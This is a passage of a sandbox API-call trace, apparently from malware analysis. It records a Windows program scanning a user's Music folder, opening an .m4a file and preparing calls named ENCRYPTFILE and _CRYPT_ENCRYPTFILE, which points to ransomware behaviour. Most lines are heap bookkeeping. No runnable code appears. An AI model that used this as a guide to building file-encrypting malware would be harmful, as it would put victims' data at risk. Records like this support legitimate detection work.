ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0114.201] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0114.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|0csxPXrUs0a.m4a|mxXesXXst_.mp3", cchCount1=31, lpString2="", cchCount2=0) returned 3 [0114.202] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0114.202] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cff1b20, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0x7fab7d20, ftLastAccessTime.dwHighDateTime=0x1d5ede0, ftLastWriteTime.dwLowDateTime=0x7fab7d20, ftLastWriteTime.dwHighDateTime=0x1d5ede0, nFileSizeHigh=0x0, nFileSizeLow=0x66d, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="0csxPXrUs0a.m4a", cAlternateFileName="0CSXPX~1.M4A")) returned 0x41ac280 [0114.202] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0114.202] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0114.202] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0114.202] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0114.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0114.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\0csxpxrus0a.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0114.203] FreeLibrary (hLibModule=0x772d0000) returned 1 [0114.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0114.203] CloseHandle (hObject=0x298) returned 1 [0114.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0114.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0114.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0114.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.204] FreeLibrary (hLibModule=0x772d0000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0114.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0114.205] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0114.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0114.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0114.206] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0114.206] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0114.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0114.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0114.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0114.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ea8 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0114.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0114.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0114.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0114.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0114.209] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0114.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0114.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0114.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0114.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cff1b20, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0x7fab7d20, ftLastAccessTime.dwHighDateTime=0x1d5ede0, ftLastWriteTime.dwLowDateTime=0x7fab7d20, ftLastWriteTime.dwHighDateTime=0x1d5ede0, nFileSizeHigh=0x0, nFileSizeLow=0x66d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="0csxPXrUs0a.m4a", cAlternateFileName="0CSXPX~1.M4A")) returned 0x41ac500 [0114.212] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0114.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.213] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 